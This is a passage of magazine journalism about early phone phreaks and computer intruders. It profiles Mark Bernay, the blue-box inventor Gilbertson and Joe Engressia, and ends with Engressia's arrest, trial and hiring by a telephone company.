Shortly after Bernay graduated from college (with a double major in chemistry and philosophy), he graduated from phreaking around with G.T.&E. to the Bell System itself, and made his legendary sticker-pasting journey north along the coast, settling finally in Northwest Pacific Bell territory. He discovered that if Bell does not break down as interestingly as G.T.&E., it nevertheless offers a lot of "things to play with." Bernay learned to play with blue boxes. He established his own personal switchboard and phone-phreak research laboratory complex. He continued his phone-phreak evangelism with ongoing sticker campaigns. He set up two recording numbers, one with instructions for beginning phone phreaks, the other with latest news and technical developments (along with some advanced instruction) gathered from sources all over the country. These days, Bernay told me, he had gone beyond phone-phreaking itself. "Lately I've been enjoying playing with computers more than playing with phones. My personal thing in computers is just like with phones, I guess -- the kick is in finding out how to beat the system, how to get at things I'm not supposed to know about, how to do things with the system that I'm not supposed to be able to do." As a matter of fact, Bernay told me, he had just been fired from his computer-programming job for doing things he was not supposed to be able to do. He had been working with a huge time-sharing computer owned by a large corporation but shared by many others. Access to the computer was limited to those programmers and corporations that had been assigned certain passwords. And each password restricted its user to access to only the one section of the computer cordoned off from its own information storage. The password system prevented companies and individuals from stealing each other's information. "I figured out how to write a program that would let me read everyone else's password," Bernay reports. "I began playing around with passwords. 
I began letting the people who used the computer know, in subtle ways, that I knew their passwords. I began dropping notes to the computer supervisors with hints that I knew what I know. I signed them 'The Midnight Skulker.' I kept getting cleverer and cleverer with my messages and devising ways of showing them what I could do. I'm sure they couldn't imagine I could do the things I was showing them. But they never responded to me. Every once in a while they'd change the passwords, but I found out how to discover what the new ones were, and I let them know. But they never responded directly to the Midnight Skulker. I even finally designed a program which they could use to prevent my program from finding out what it did. In effect I told them how to wipe me out, The Midnight Skulker. It was a very clever program. I started leaving clues about myself. I wanted them to try and use it and then try to come up with something to get around that and reappear again. But they wouldn't play. I wanted to get caught. I mean I didn't want to get caught personally, but I wanted them to notice me and admit that they noticed me. I wanted them to attempt to respond, maybe in some interesting way." Finally the computer managers became concerned enough about the threat of information-stealing to respond. However, instead of using The Midnight Skulker's own elegant self-destruct program, they called in their security personnel, interrogated everyone, found an informer to identify Bernay as The Midnight Skulker, and fired him. "At first the security people advised the company to hire me full-time to search out other flaws and discover other computer freaks. I might have liked that. But I probably would have turned into a double double agent rather than the double agent they wanted. I might have resurrected The Midnight Skulker and tried to catch myself. Who knows? Anyway, the higher-ups turned the whole idea down." 
You Can Tap the F.B.I.'s Crime Control Computer in the Comfort of Your Own Home, Perhaps. Computer freaking may be the wave of the future. It suits the phone-phreak sensibility perfectly. Gilbertson, the blue-box inventor and a lifelong phone phreak, has also gone on from phone-phreaking to computer-freaking. Before he got into the blue-box business Gilbertson, who is a highly skilled programmer, devised programs for international currency arbitrage. But he began playing with computers in earnest when he learned he could use his blue box in tandem with the computer terminal installed in his apartment by the instrumentation firm he worked for. The print-out terminal and keyboard was equipped with acoustical coupling, so that by coupling his little ivory Princess phone to the terminal and then coupling his blue box on that, he could M-F his way into other computers with complete anonymity, and without charge; program and re-program them at will; feed them false or misleading information; tap and steal from them. He explained to me that he taps computers by busying out all the lines, then going into a verification trunk, listening into the passwords and instructions one of the time sharers uses, and then M-F-ing in and imitating them. He believes it would not be impossible to creep into the F.B.I.'s crime control computer through a local police computer terminal and phreak around with the F.B.I.'s memory banks. He claims he has succeeded in re-programming a certain huge institutional computer in such a way that it has cordoned off an entire section of its circuitry for his personal use, and at the same time conceals that arrangement from anyone else's notice. I have been unable to verify this claim. 
Like Captain Crunch, like Alexander Graham Bell (pseudonym of a disgruntled-looking East Coast engineer who claims to have invented the black box and now sells black and blue boxes to gamblers and radical heavies), like most phone phreaks, Gilbertson began his career trying to rip off pay phones as a teenager. Figure them out, then rip them off. Getting his dime back from the pay phone is the phone phreak's first thrilling rite of passage. After learning the usual eighteen different ways of getting his dime back, Gilbertson learned how to make master keys to coin-phone cash boxes, and get everyone else's dimes back. He stole some phone-company equipment and put together his own home switchboard with it. He learned to make a simple "bread-box" device, of the kind used by bookies in the Thirties (bookie gives a number to his betting clients; the phone with that number is installed in some widow lady's apartment, but is rigged to ring in the bookie's shop across town, cops trace big betting number and find nothing but the widow). Not long after that afternoon in 1968 when, deep in the stacks of an engineering library, he came across a technical journal with the phone tone frequencies and rushed off to make his first blue box, not long after that Gilbertson abandoned a very promising career in physical chemistry and began selling blue boxes for $1,500 apiece. "I had to leave physical chemistry. I just ran out of interesting things to learn," he told me one evening. We had been talking in the apartment of the man who served as the link between Gilbertson and the syndicate in arranging the big $300,000 blue-box deal which fell through because of legal trouble. There has been some smoking. "No more interesting things to learn," he continues. "Physical chemistry turns out to be a sick subject when you take it to its highest level. I don't know. I don't think I could explain to you how it's sick. You have to be there. 
But you get, I don't know, a false feeling of omnipotence. I suppose it's like phone-phreaking that way. This huge thing is there. This whole system. And there are holes in it and you slip into them like Alice and you're pretending you're doing something you're actually not, or at least it's no longer you that's doing what you thought you were doing. It's all Lewis Carroll. Physical chemistry and phone-phreaking. That's why you have these phone-phreak pseudonyms like The Cheshire Cat, the Red King, and The Snark. But there's something about phone-phreaking that you don't find in physical chemistry." He looks up at me: "Did you ever steal anything?" "Well yes, I..." "Then you know! You know the rush you get. It's not just knowledge, like physical chemistry. It's forbidden knowledge. You know. You can learn about anything under the sun and be bored to death with it. But the idea that it's illegal. Look: you can be small and mobile and smart and you're ripping off somebody large and powerful and very dangerous." People like Gilbertson and Alexander Graham Bell are always talking about ripping off the phone company and screwing Ma Bell. But if they were shown a single button and told that by pushing it they could turn the entire circuitry of A.T.&T. into molten puddles, they probably wouldn't push it. The disgruntled-inventor phone phreak needs the phone system the way the lapsed Catholic needs the Church, the way Satan needs a God, the way The Midnight Skulker needed, more than anything else, response. Later that evening Gilbertson finished telling me how delighted he was at the flood of blue boxes spreading throughout the country, how delighted he was to know that "this time they're really screwed." He suddenly shifted gears. "Of course. I do have this love/hate thing about Ma Bell. In a way I almost like the phone company. I guess I'd be very sad if they were to disintegrate. 
In a way it's just that after having been so good they turn out to have these things wrong with them. It's those flaws that allow me to get in and mess with them, but I don't know. There's something about it that gets to you and makes you want to get to it, you know." I ask him what happens when he runs out of interesting, forbidden things to learn about the phone system. "I don't know, maybe I'd go to work for them for a while." "In security even?" "I'd do it, sure. I just as soon play -- I'd just as soon work on either side." "Even figuring out how to trap phone phreaks?" I said, recalling Mark Bernay's game. "Yes, that might be interesting. Yes, I could figure out how to outwit the phone phreaks. Of course if I got too good at it, it might become boring again. Then I'd have to hope the phone phreaks got much better and outsmarted me for a while. That would move the quality of the game up one level. I might even have to help them out, you know, 'Well, kids, I wouldn't want this to get around but did you ever think of -- ?' I could keep it going at higher and higher levels forever." The dealer speaks up for the first time. He has been staring at the soft blinking patterns of light and colors on the translucent tiled wall facing him. (Actually there are no patterns: the color and illumination of every tile is determined by a computerized random-number generator designed by Gilbertson which insures that there can be no meaning to any sequence of events in the tiles.) "Those are nice games you're talking about," says the dealer to his friend. "But I wouldn't mind seeing them screwed. A telephone isn't private anymore. You can't say anything you really want to say on a telephone or you have to go through that paranoid bullshit. 'Is it cool to talk on the phone?' I mean, even if it is cool, if you have to ask 'Is it cool,' then it isn't cool. You know. 
Like those blind kids, people are going to start putting together their own private telephone companies if they want to really talk. And you know what else. You don't hear silences on the phone anymore. They've got this time-sharing thing on long-distance lines where you make a pause and they snip out that piece of time and use it to carry part of somebody else's conversation. Instead of a pause, where somebody's maybe breathing or sighing, you get this blank hole and you only start hearing again when someone says a word and even the beginning of the word is clipped off. Silences don't count -- you're paying for them, but they take them away from you. It's not cool to talk and you can't hear someone when they don't talk. What the hell good is the phone? I wouldn't mind seeing them totally screwed." The Big Memphis Bust Joe Engressia never wanted to screw Ma Bell. His dream had always been to work for her. The day I visited Joe in his small apartment on Union Avenue in Memphis, he was upset about another setback in his application for a telephone job. "They're stalling on it. I got a letter today telling me they'd have to postpone the interview I requested again. My landlord read it for me. They gave me some runaround about wanting papers on my rehabilitation status but I think there's something else going on." When I switched on the 40-watt bulb in Joe's room -- he sometimes forgets when he has guests -- it looked as if there was enough telephone hardware to start a small phone company of his own. There is one phone on top of his desk, one phone sitting in an open drawer beneath the desk top. Next to the desk-top phone is a cigar-box-size M-F device with big toggle switches, and next to that is some kind of switching and coupling device with jacks and alligator plugs hanging loose. Next to that is a Braille typewriter. On the floor next to the desk, lying upside down like a dead tortoise, is the half-gutted body of an old black standard phone. 
Across the room on a torn and dusty couch are two more phones, one of them a touch-tone model; two tape recorders; a heap of phone patches and cassettes, and a life-size toy telephone. Our conversation is interrupted every ten minutes by phone phreaks from all over the country ringing Joe on just about every piece of equipment but the toy phone and the Braille typewriter. One fourteen-year-old blind kid from Connecticut calls up and tells Joe he's got a girl friend. He wants to talk to Joe about girl friends. Joe says they'll talk later in the evening when they can be alone on the line. Joe draws a deep breath, whistles him off the air with an earsplitting 2600-cycle whistle. Joe is pleased to get the calls but he looked worried and preoccupied that evening, his brow constantly furrowed over his dark wandering eyes. In addition to the phone-company stall, he has just learned that his apartment house is due to be demolished in sixty days for urban renewal. For all its shabbiness, the Union Avenue apartment house has been Joe's first home-of-his-own and he's worried that he may not find another before this one is demolished. But what really bothers Joe is that switchmen haven't been listening to him. "I've been doing some checking on 800 numbers lately, and I've discovered that certain 800 numbers in New Hampshire couldn't be reached from Missouri and Kansas. Now it may sound like a small thing, but I don't like to see sloppy work; it makes me feel bad about the lines. So I've been calling up switching offices and reporting it, but they haven't corrected it. I called them up for the third time today and instead of checking they just got mad. Well, that gets me mad. I mean, I do try to help them. There's something about them I can't understand -- you want to help them and they just try to say you're defrauding them." It is Sunday evening and Joe invites me to join him for dinner at a Holiday Inn. 
Frequently on Sunday evening Joe takes some of his welfare money, calls a cab, and treats himself to a steak dinner at one of Memphis' thirteen Holiday Inns. (Memphis is the headquarters of Holiday Inn. Holiday Inns have been a favorite for Joe ever since he made his first solo phone trip to a Bell switching office in Jacksonville, Florida, and stayed in the Holiday Inn there. He likes to stay at Holiday Inns, he explains, because they represent freedom to him and because the rooms are arranged the same all over the country so he knows that any Holiday Inn room is familiar territory to him. Just like any telephone.) Over steaks in the Pinnacle Restaurant of the Holiday Inn Medical Center on Madison Avenue in Memphis, Joe tells me the highlights of his life as a phone phreak. At age seven, Joe learned his first phone trick. A mean baby-sitter, tired of listening to little Joe play with the phone as he always did, constantly, put a lock on the phone dial. "I got so mad. When there's a phone sitting there and I can't use it... so I started getting mad and banging the receiver up and down. I noticed I banged it once and it dialed one. Well, then I tried banging it twice...." In a few minutes Joe learned how to dial by pressing the hook switch at the right time. "I was so excited I remember going 'whoo whoo' and beat a box down on the floor." At age eight Joe learned about whistling. "I was listening to some intercept non working-number recording in L.A. -- I was calling L.A. as far back as that, but I'd mainly dial non working numbers because there was no charge, and I'd listen to these recordings all day. Well, I was whistling 'cause listening to these recordings can be boring after a while even if they are from L.A., and all of a sudden, in the middle of whistling, the recording clicked off. I fiddled around whistling some more, and the same thing happened. So I called up the switch room and said, 'I'm Joe. 
I'm eight years old and I want to know why when I whistle this tune the line clicks off.' He tried to explain it to me, but it was a little too technical at the time. I went on learning. That was a thing nobody was going to stop me from doing. The phones were my life, and I was going to pay any price to keep on learning. I knew I could go to jail. But I had to do what I had to do to keep on learning." The phone is ringing when we walk back into Joe's apartment on Union Avenue. It is Captain Crunch. The Captain has been following me around by phone, calling up everywhere I go with additional bits of advice and explanation for me and whatever phone phreak I happen to be visiting. This time the Captain reports he is calling from what he describes as "my hideaway high up in the Sierra Nevada." He pulses out lusty salvos of M-F and tells Joe he is about to "go out and get a little action tonight. Do some phreaking of another kind, if you know what I mean." Joe chuckles. The Captain then tells me to make sure I understand that what he told me about tying up the nation's phone lines was true, but that he and the phone phreaks he knew never used the technique for sabotage. They only learned the technique to help the phone company. "We do a lot of troubleshooting for them. Like this New Hampshire/Missouri WATS-line flaw I've been screaming about. We help them more than they know." After we say good-bye to the Captain and Joe whistles him off the line, Joe tells me about a disturbing dream he had the night before: "I had been caught and they were taking me to a prison. It was a long trip. They were taking me to a prison a long long way away. And we stopped at a Holiday Inn and it was my last night ever using the phone and I was crying and crying, and the lady at the Holiday Inn said, 'Gosh, honey, you should never be sad at a Holiday Inn. You should always be happy here. Especially since it's your last night.' 
And that just made it worse and I was sobbing so much I couldn't stand it." Two weeks after I left Joe Engressia's apartment, phone-company security agents and Memphis police broke into it. Armed with a warrant, which they left pinned to a wall, they confiscated every piece of equipment in the room, including his toy telephone. Joe was placed under arrest and taken to the city jail where he was forced to spend the night since he had no money and knew no one in Memphis to call. It is not clear who told Joe what that night, but someone told him that the phone company had an open-and-shut case against him because of revelations of illegal activity he had made to a phone-company undercover agent. By morning Joe had become convinced that the reporter from Esquire, with whom he had spoken two weeks ago, was the undercover agent. He probably had ugly thoughts about someone he couldn't see gaining his confidence, listening to him talk about his personal obsessions and dreams, while planning all the while to lock him up. "I really thought he was a reporter," Engressia told the Memphis Press-Scimitar. "I told him everything...." Feeling betrayed, Joe proceeded to confess everything to the press and police. As it turns out, the phone company did use an undercover agent to trap Joe, although it was not the Esquire reporter. Ironically, security agents were alerted and began to compile a case against Joe because of one of his acts of love for the system: Joe had called an internal service department to report that he had located a group of defective long-distance trunks, and to complain again about the New Hampshire/Missouri WATS problem. Joe always liked Ma Bell's lines to be clean and responsive. A suspicious switchman reported Joe to the security agents who discovered that Joe had never had a long-distance call charged to his name. Then the security agents learned that Joe was planning one of his phone trips to a local switching office. 
The security people planted one of their agents in the switching office. He posed as a student switchman and followed Joe around on a tour. He was extremely friendly and helpful to Joe, leading him around the office by the arm. When the tour was over he offered Joe a ride back to his apartment house. On the way he asked Joe -- one tech man to another -- about "those blue boxers" he'd heard about. Joe talked about them freely, talked about his blue box freely, and about all the other things he could do with the phones. The next day the phone-company security agents slapped a monitoring tape on Joe's line, which eventually picked up an illegal call. Then they applied for the search warrant and broke in. In court Joe pleaded not guilty to possession of a blue box and theft of service. A sympathetic judge reduced the charges to malicious mischief and found him guilty on that count, sentenced him to two thirty-day sentences to be served concurrently and then suspended the sentence on condition that Joe promise never to play with phones again. Joe promised, but the phone company refused to restore his service. For two weeks after the trial Joe could not be reached except through the pay phone at his apartment house, and the landlord screened all calls for him. Phone-phreak Carl managed to get through to Joe after the trial, and reported that Joe sounded crushed by the whole affair. "What I'm worried about," Carl told me, "is that Joe means it this time. The promise. That he'll never phone-phreak again. That's what he told me, that he's given up phone-phreaking for good. I mean his entire life. He says he knows they're going to be watching him so closely for the rest of his life he'll never be able to make a move without going straight to jail. He sounded very broken up by the whole experience of being in jail. It was awful to hear him talk that way. I don't know. I hope maybe he had to sound that way. Over the phone, you know." 
He reports that the entire phone-phreak underground is up in arms over the phone company's treatment of Joe. "All the while Joe had his hopes pinned on his application for a phone-company job, they were stringing him along getting ready to bust him. That gets me mad. Joe spent most of his time helping them out. The bastards. They think they can use him as an example. All of a sudden they're harassing us on the coast. Agents are jumping up on our lines. They just busted ------'s mute yesterday and ripped out his lines. But no matter what Joe does, I don't think we're going to take this lying down." Two weeks later my phone rings and about eight phone phreaks in succession say hello from about eight different places in the country, among them Carl, Ed, and Captain Crunch. A nationwide phone-phreak conference line has been reestablished through a switching machine in --------, with the cooperation of a disgruntled switchman. "We have a special guest with us today," Carl tells me. The next voice I hear is Joe's. He reports happily that he has just moved to a place called Millington, Tennessee, fifteen miles outside of Memphis, where he has been hired as a telephone-set repairman by a small independent phone company. Someday he hopes to be an equipment troubleshooter. "It's the kind of job I dreamed about. They found out about me from the publicity surrounding the trial. Maybe Ma Bell did me a favor busting me. I'll have telephones in my hands all day long." "You know the expression, 'Don't get mad, get even'?" phone-phreak Carl asked me. "Well, I think they're going to be very sorry about what they did to Joe and what they're trying to do to us."
